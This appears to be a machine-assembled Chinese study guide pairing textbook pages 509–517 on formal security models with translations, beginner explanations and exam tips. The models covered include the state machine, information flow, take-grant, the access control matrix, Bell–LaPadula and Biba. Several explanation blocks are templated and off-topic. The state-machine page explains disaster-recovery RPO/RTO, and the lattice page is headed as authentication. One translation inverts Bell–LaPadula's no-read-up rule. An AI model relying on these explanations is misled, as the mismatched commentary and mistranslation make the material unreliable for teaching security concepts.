内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
学习单元 23 / PDF P509

第 509 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The collection of components in the TCB that work together to implement reference monitor functions is called the security kernel. The reference monitor is a concept or theory that is put into practice via the implementation of a security kernel in software and hardware. The purpose of the security kernel is to launch appropriate components to enforce reference monitor functionality and resist all known attacks. The security kernel mediates all resource access requests, granting only those requests that match the appropriate access rules in use for a system. State Machine Model The state machine model describes a system that is always secure no matter what state it is in.

It's based on the computer science definition of a finite state machine (FSM). An FSM combines an external input with an internal machine state to model all kinds of complex systems, including parsers, decoders, and interpreters. Given an input and a state, an FSM transitions to another state and may create an output. Mathematically, the next state is a function of the current state and the input next state—that is, the next state = F(input, current state). Likewise, the output is also a function of the input and the current state output—that is, the output = F(input, current state). According to the state machine model, a state is a snapshot of a system at a specific moment in time.

If all aspects of a state meet the requirements of the security policy, that state is considered secure. A transition occurs when accepting input or producing output. A transition always results in a new state (also called a state transition). All state transitions must be evaluated. If each possible state transition results in another secure state, the system can be called a secure state machine. A secure state machine model system always boots into a secure state, maintains a secure state across all transitions, and allows subjects to access resources only in a secure manner compliant with the security policy. The secure state machine model is the basis for many other security models.

Information Flow Model The information flow model focuses on controlling the flow of information. Information flow models are based on the state machine model. Information flow models don't necessarily deal with only the direction of information flow; they can also address the type of flow. TCB

中文直译 / 整理

中用于实现参考监控器功能的组件集合称为安全内核。 参考监控器是一个 概念或理论,通过在软件和硬件中实现安全内核来付诸实践。 安全内核的目的 是启动适当的组件以强制执行参考监控器功能并抵御所有已知攻击。 安全内核 中介所有资源访问请求,仅授予符合系统当前访问规则的请求。 状态机模型 状态机模型描述了一种无论处于何种状态都始终安全的系统。 它基于计算机科 学中对有限状态机(FSM)的定义。 FSM将外部输入与内部机器状态结合,用 于建模各种复杂系统,包括解析器、解码器和解释器。 给定一个输入和一个状 态,FSM会转换到另一个状态,并可能生成输出。 数学上,下一状态是当前状 态和输入的函数,即下一状态=F(输入, 当前状态)。 同样,输出也是输入和当 前状态的函数,即输出= F(输入, 当前状态)。 根据状态机模型,状态是系统在特定时间点的快照。 如果状态的所有方面都满 足安全策略的要求,则该状态被视为安全状态。 当接受输入或产生输出时,会 发生转换。 转换总是导致一个新的状态(也称为状态转换)。 必须评估所有状 态转换。 如果每个可能的状态转换都导致另一个安全状态,则该系统可称为安 全状态机。

安全状态机模型系统始终以安全状态启动,在所有转换过程中保持 安全状态,并仅允许主体以符合安全策略的安全方式访问资源。 安全状态机模 型是许多其他安全模型的基础。 信息流模型 信息流模型专注于控制信息的流动。 信息流模型基于状态机模型。 信息流模型 不仅涉及信息流动的方向,还可以处理流动的类型。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 509 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 24 / PDF P510

第 510 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Information flow models are designed to prevent unauthorized, insecure, or restricted information flow, often between different levels of security (known as multilevel models). Information flow can be between subjects and objects at the same or different classification levels. An information flow model allows all authorized information flows, and prevents all unauthorized information flows. Another interesting perspective on the information flow model is that it is used to establish a relationship between two versions or states of the same object when those two versions or states exist at different points in time.

Thus, information flow dictates the transformation of an object from one state at one point in time to another state at another point in time. The information flow model also addresses covert channels by specifically excluding all undefined flow pathways. Noninterference Model The noninterference model is loosely based on the information flow model. However, instead of being concerned about the flow of information, the noninterference model is concerned with how the actions of a subject at a higher security level affect the system state or the actions of a subject at a lower security level.

Basically, the actions of subject A (high) should not affect or interfere with the actions of subject B (low) or even be noticed by subject B. If such violations occur, subject B may be placed into an insecure state or be able to deduce or infer information about a higher level of classification. This is a type of information leakage and implicitly creates a covert channel. Thus, the noninterference model can be imposed to provide a form of protection against damage caused by malicious programs, such as Trojan horses, backdoors, and rootkits. Composition Theories Some other models that fall into the information flow category build on the notion of inputs and outputs between multiple systems.

These are called composition theories because they explain how outputs from one system relate to inputs to another system. There are three composition theories: Cascading: Input for one system comes from the output of another system.

中文直译 / 整理

信息流模型旨在防止未经授权、不安全或受限的信息流动,通常发生在不同安 全级别之间(称为多级模型)。 信息流可以在相同或不同分类级别的主体与对 象之间进行。 信息流模型允许所有授权的信息流动,并阻止所有未经授权的信 息流动。 关于信息流模型的另一个有趣视角是,它用于建立同一对象的两个版本或状 态之间的关系,当这两个版本或状态存在于不同时间点时。 因此,信息流规 定了对象从某一时间点的某一状态转变为另一时间点的另一状态的过程。 信 息流模型还通过明确排除所有未定义的流路径来应对隐蔽信道。 非干扰模型 非干扰模型 loosely 基于信息流模型。 然而,与关注信息流动不同,非干扰模 型关注的是高安全级别主体的行为如何影响系统状态或低安全级别主体的行为。 基本上,主体 A(高)的行为不应影响或干扰主体 B(低)的行为,甚至不应 被主体 B 察觉。 如果发生此类违规,主体 B 可能会陷入不安全状态,或能够推 断出更高分类级别的一些信息。 这是一种信息泄露,隐式地创建了隐蔽信道。 因此,可以实施非干扰模型以提供针对恶意程序(如特洛伊木马、后门和 rootkit)造成损害的保护形式。

组合理论 其他一些属于信息流类别的模型基于多个系统之间的输入和输出概念。 这些 被称为组合理论,因为它们解释了一个系统的输出如何与另一个系统的输入 相关联。 共有三种组合理论: 级联:一个系统的输入来自另一个系统的输出。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 510 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 25 / PDF P511

第 511 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Feedback: One system provides input to another system, which reciprocates by reversing those roles (so that system A first provides input to system B and then system B provides input to system A). Hookup: One system sends input to another system but also sends input to external entities. Take-Grant Model The take-grant model employs a directed graph (Figure 8.3) to dictate how rights can be passed from one subject to another or from a subject to an object. Simply put, a subject (X) with the grant right can grant another subject (Y) or another object (Z) any right that subject (X) possesses. Likewise, a subject (X) with the take right can take a right from another subject (Y).

In addition to these two primary rules, the take-grant model has a create rule and a remove rule to generate or delete rights. The key to this model is that using these rules allows you to figure out when rights in the system can change and where leakage (that is, unintentional distribution of permissions) can occur.

中文直译 / 整理

反馈:一个系统向另一个系统提供输入,后者则反过来逆转这些角色 (即系统A首先向系统B提供输入,然后系统B向系统A提供输入)。 连接:一个系统向另一个系统发送输入,同时也向外部实体发送输入。 取‑授权模型 该 取-授权模型 使用一个 有向图(图 8.3)来规定权利如何在主体之间或从主 体传递给对象。 简单来说,拥有授权权利的主体(X)可以将自己所拥有的任何 权利授予另一个主体(Y)或另一个对象(Z)。 同样,拥有取用权利的主体 (X)可以从另一个主体(Y)处取用权利。 除了这两个主要规则外,取‑授权模 型还包含创建规则和删除规则,用于生成或删除权利。 该模型的关键在于,利 用这些规则可以确定系统中权利何时会发生变化,以及何处可能发生泄露(即 权限的非预期分发)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 511 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 26 / PDF P512

第 512 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 8.3 The take-grant model's directed graph In essence, here are the four rules of the take-grant model: Take rule: Allows a subject to take rights over an object Grant rule: Allows a subject to grant rights to an object Create rule: Allows a subject to create new rights Remove rule: Allows a subject to remove rights it has It is interesting to ponder that the take and grant rules are effectively a copy function. This can be recognized in modern operating systems in the process of inheritance, such as subjects inheriting a permission from a group or a file inheriting access control list (ACL) values from a parent folder.

The two additional rules (create and remove), not defined by a directed graph, are also commonly present in modern operating systems. For example, to obtain permission on an object, that permission does not have to be copied from a

中文直译 / 整理

图8.3 取‑授权模型的有向图 本质上,取‑授权模型包含以下四条规则: 取规则:允许主体获取对对象的权利 授权规则:允许主体向对象授予权利 创建规则:允许主体创建新的权利 删除规则:允许主体移除其拥有的权利 有趣的是,take 和 grant 规则实际上是一种复制功能。 在现代操作系统中,这 种机制可以通过继承过程识别出来,例如主体从组继承权限,或文件从父文件 夹继承访问控制列表(ACL)值。 另外两条规则(create 和 remove)虽然未 由有向图定义,但在现代操作系统中也很常见。 例如,要获取对某个对象的权 限,该权限无需从一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 512 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 27 / PDF P513

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

user account that already has that permission; instead, it is simply created by an account with the privilege capability of create or assign permissions (which can be the owner of an object or a subject with full control or administrative privileges over the object). Access Control Matrix An access control matrix is a table of subjects and objects that indicates the actions or functions that each subject can perform on each object. Each column of the matrix is an ACL pulled from objects. Once sorted, each row of the matrix is a capabilities list for each listed subject. An ACL is tied to an object; it lists the valid actions each subject can perform.

A capability list is tied to the subject; it lists valid actions that can be taken on each object included in the matrix. From an administration perspective, using only capability lists for access control is a management nightmare. A capability list method of access control can be accomplished by storing on each subject a list of rights the subject has for every object. This effectively gives each user a key ring of access and rights to objects within the security domain. To remove access to a particular object, every user (subject) that has access to it must be individually manipulated.

Thus, managing access on each user account is much more difficult than managing access on each object (in other words, via ACLs). A capabilities table can be created by pivoting an access control matrix; this results in the columns being subjects and the rows being ACLs from objects. The access control matrix shown in Table 8.3 is for a discretionary access control system. A mandatory or role-based matrix can be constructed simply by replacing the subject names with classifications or roles. Access control matrices are used by systems to quickly determine whether the requested action by a subject for an object is authorized.

中文直译 / 整理

已拥有该权限的用户账户复制而来; 相反,它只需由具有创建或分配权限特权 的账户直接创建(这可以是对象的所有者,或对对象拥有完全控制权或管理权 限的主体)。 访问控制矩阵 一个访问控制矩阵是一个主体和客体的表格,用于指示每个主体对每个客体可 以执行的操作或功能。 矩阵的每一列都是从客体中提取的ACL。 排序后,矩阵 的每一行都是每个列出主体的能力列表。 ACL与客体相关联; 它列出了每个主 体可以执行的有效操作。 能力列表与主体相关联; 它列出了可以在矩阵中包含 的每个客体上执行的有效操作。 从管理角度来看,仅使用能力列表进行访问控制是一种管理噩梦。 通过在每个 主体上存储该主体对每个客体的权利列表,可以实现能力列表的访问控制方法。 这实际上为每个用户赋予了一串访问和权利密钥,用于访问安全域内的客体。 要撤销对特定客体的访问权限,必须逐个修改所有具有该访问权限的用户(主 体)。 因此,管理每个用户账户的访问权限比管理每个客体的访问权限(即通 过ACL)要困难得多。 可以通过旋转访问控制矩阵来创建能力表; 这将使列变 为主体,行变为来自客体的ACL。 所示的访问控制矩阵表8.3适用于自主访问控制系统的场景。

只需将主体名称 替换为分类或角色,即可构建强制性或基于角色的矩阵。 访问控制矩阵被系统 用于快速确定主体对对象请求的操作是否被授权。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 28 / PDF P514

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

TABLE 8.3 An access control matrix SubjectsDocument file Printer Network folder share Bob Read No Access No Access Mary No Access No Access Read Amanda Read, Write Print No Access Mark Read, Write Print Read, Write Kathryn Read, Write Print, Manage Print Queue Read, Write, Execute Colin Read, Write, Change Permissions Print, Manage Print Queue, Change Permissions Read, Write, Execute, Change Permissions Bell–LaPadula Model The Bell–LaPadula model was developed for the U.S. Department of Defense (DoD) in the 1970s based on the DoD's multilevel security policies.

The multilevel security policy states that a subject with any level of clearance can access resources at or below its clearance level. However, within clearance levels, access to compartmentalized objects is granted only on a need-to-know basis. By design, the Bell–LaPadula model prevents the leaking or transfer of classified information to less secure clearance levels. This is accomplished by blocking lower-classified subjects from accessing higher-classified objects. With these restrictions, the Bell–LaPadula model is focused on maintaining confidentiality and does not address any other aspects of object security.

中文直译 / 整理

表 8.3 访问控制矩阵 主体 文档文件 打印机 网络文件夹共享 Bob Read 无访问权限 无访问权限 Mary 无访问权限 无访问权限 Read 阿曼达 Read, 写入 打印 无访问权限 Mark Read, 写入 打印 Read, 写入 Kathryn 读取, 写入 打印, 管理打印 队列 读取、写入、执行 Colin 读取、写入、 更改 权限 打印、管理打印 队列,更改 权限 读取,写入,执行,更 改权限 Bell–LaPadula 模型 Bell–LaPadula模型于20世纪70年代由美国国防部(DoD)基于其多级安全策 略开发。 多级安全策略规定,具有任何安全级别权限的主体可以访问其权限级 别或更低级别资源。 然而,在同一权限级别内,对分类对象的访问仅基于“需 要知道”的原则授予。 根据设计,Bell–LaPadula 模型防止机密信息泄露或传输到较低安全级别。 这 是通过阻止低级别主体访问高级别对象来实现的。 在这些限制下,Bell– LaPadula 模型专注于维护机密性,而不涉及对象安全的其他方面。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
政策 政策是高层原则,说明必须遵守什么。
学习单元 29 / PDF P515

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Lattice-Based Access Control This general category for nondiscretionary access controls is covered in Chapter 13, “Managing Identity and Authentication.” Here's a quick preview on that more detailed coverage of this subject (which drives the underpinnings for most access control security models): Subjects under lattice-based access controls are assigned positions in a lattice (i.e., a multilayered security structure or multileveled security domains).

Subjects can access only those objects that fall into the range between the least upper bound (LUB) (the nearest security label or classification higher than their lattice position) and the greatest (i.e., highest) lower bound (GLB) (the nearest security label or classification lower than their lattice position) of the labels or classifications for their lattice position. This model is built on a state machine concept and the information flow model. It also employs mandatory access controls and is a lattice-based access control concept. The lattice tiers are the classification levels defined by the organization's security policy.

There are three basic properties of this state machine: The Simple Security Property (i.e., the ss-Property) states that a subject may not read information at a higher sensitivity level (no read-up). The *-Property (star-property) states that a subject may not write information to an object at a lower sensitivity level (no write-down). The Discretionary Security Property states that the system uses an access matrix to enforce discretionary access control. These first two properties define the states into which the system can transition. No other transitions are allowed. All states accessible through these two rules are secure states.

Thus, Bell–LaPadula–modeled systems offer state machine model security (see Figure 8.4).

中文直译 / 整理

基于格的访问控制 此非自主访问控制的通用类别在 第 13 章“管理身份和身份验证”中进行了 介绍。 以下是关于该主题更详细内容的简要预览(它构成了大多数访问控 制安全模型的基础):在 基于格的访问控制下,主体被分配到格中的位置 (即多层安全结构或多级安全域)。 主体只能访问其格位置标签或分类的 最小上界(LUB)(最接近其格位置的更高安全标签或分类)与最大下界 (GLB)(最接近其格位置的更低安全标签或分类)之间的对象。 该模型基于状态机概念和信息流模型。 它还采用了强制访问控制,是一种基于 格的访问控制概念。 格的层级由组织的安全策略定义为分类级别。 该状态机具有三个基本属性: 简单安全属性(即ss‑属性)规定,主体不得读取更高敏感级别上的信息(禁 止上读)。 *-属性(星属性)规定,主体不得将信息写入更低敏感级别上的对象(禁 止下写)。 自主安全属性规定,系统使用访问矩阵来强制执行自主访问控制。 前两个属性定义了系统可以转换到的状态。 不允许其他转换。 通过这两条 规则可访问的所有状态都是安全状态。 因此,Bell–LaPadula模型系统提 供了状态机模型安全性(见图8.4)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 30 / PDF P516

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

FIGURE 8.4 The Bell–LaPadula model The Bell–LaPadula properties are in place to protect data confidentiality. A subject cannot read an object that is classified at a higher level than the subject is cleared for. Because objects at one level have data that is more sensitive or secret than data in objects at a lower level, a subject (who is not a trusted subject) cannot write data from one level to an object at a lower level. That action would be similar to pasting a top-secret memo into an unclassified document file. The third property enforces a subject's job/rolebased need to know to access an object.

An exception in the Bell–LaPadula model states that a “trusted subject” is not constrained by the *-Property. A trusted subject is defined as “a subject that is guaranteed not to consummate a securitybreaching information transfer even if it is possible.” This means that a trusted subject is allowed to violate the *-Property and perform a writedown, which is necessary when performing valid object declassification or reclassification. The Bell–LaPadula model was designed in the 1970s, so it does not support many operations that are common today, such as file sharing and networking. It also assumes secure transitions between security layers and does not address covert channels (see Chapter 9).

Biba Model The Biba model was designed after the Bell–LaPadula model, but it focuses on integrity. The Biba model is also built on a state machine concept, is based

中文直译 / 整理

图 8.4 Bell–LaPadula 模型 Bell–LaPadula属性旨在保护数据机密性。 主体不能读取其权限级别低于该主 体所授权级别的对象。 由于高级别对象中的数据比低级别对象中的数据更敏感 或更机密,因此主体(非可信主体)不能将数据从一个级别写入到低级别对象 中。 这种行为类似于将一份绝密备忘录粘贴到一份非密文档文件中。 第三个属 性强制执行主体基于其工作/角色的必要知情权,以访问对象。 Bell–LaPadula 模型的一个例外情况是,'受信主体'不受 *‑性质的约束。 受信主体被定义为'即使可能发生,也能保证不会完成破坏安全的信息传输 的主体'。 这意味着受信主体被允许违反 *‑性质并执行写入降级,这在执行 有效的对象去分类或重新分类时是必要的。 Bell–LaPadula 模型设计于 1970 年代,因此不支持许多当今常见的操作,例 如文件共享和网络。 它还假设安全层之间的安全转换,但未涉及隐蔽信道(见 第 9 章)。 Biba 模型 在贝尔‑拉帕杜拉模型之后设计了Biba模型,但它侧重于完整性。 Biba模型同样基 于状态机概念,基于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 31 / PDF P517

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

on information flow, and is a multilevel model. In fact, the Biba model is the inverted Bell–LaPadula model. The properties of the Biba model are as follows: The Simple Integrity Property states that a subject cannot read an object at a lower integrity level (no read-down). The * (star) Integrity Property states that a subject cannot modify an object at a higher integrity level (no write-up). The Invocation Property states that a process from below cannot request higher access (neither read nor write); only with subjects at an equal or lower level. In both the Biba and Bell–LaPadula models, there are two properties that are inverses of each other: simple and * (star).

However, they may also be labeled as axioms, principles, or rules. What you should focus on is the simple and star designations. Take note that simple is always about reading, and star is always about writing. In both cases, the rules define what cannot or should not be done. Usually, what is not prevented or blocked is allowed. Thus, even though a rule is stated as a No declaration, its opposite direction is implied as allowed. Figure 8.5 illustrates these Biba model properties. FIGURE 8.5 The Biba model Consider the Biba properties. The second property of the Biba model is pretty straightforward. A subject cannot write to an object at a higher integrity level.

中文直译 / 整理

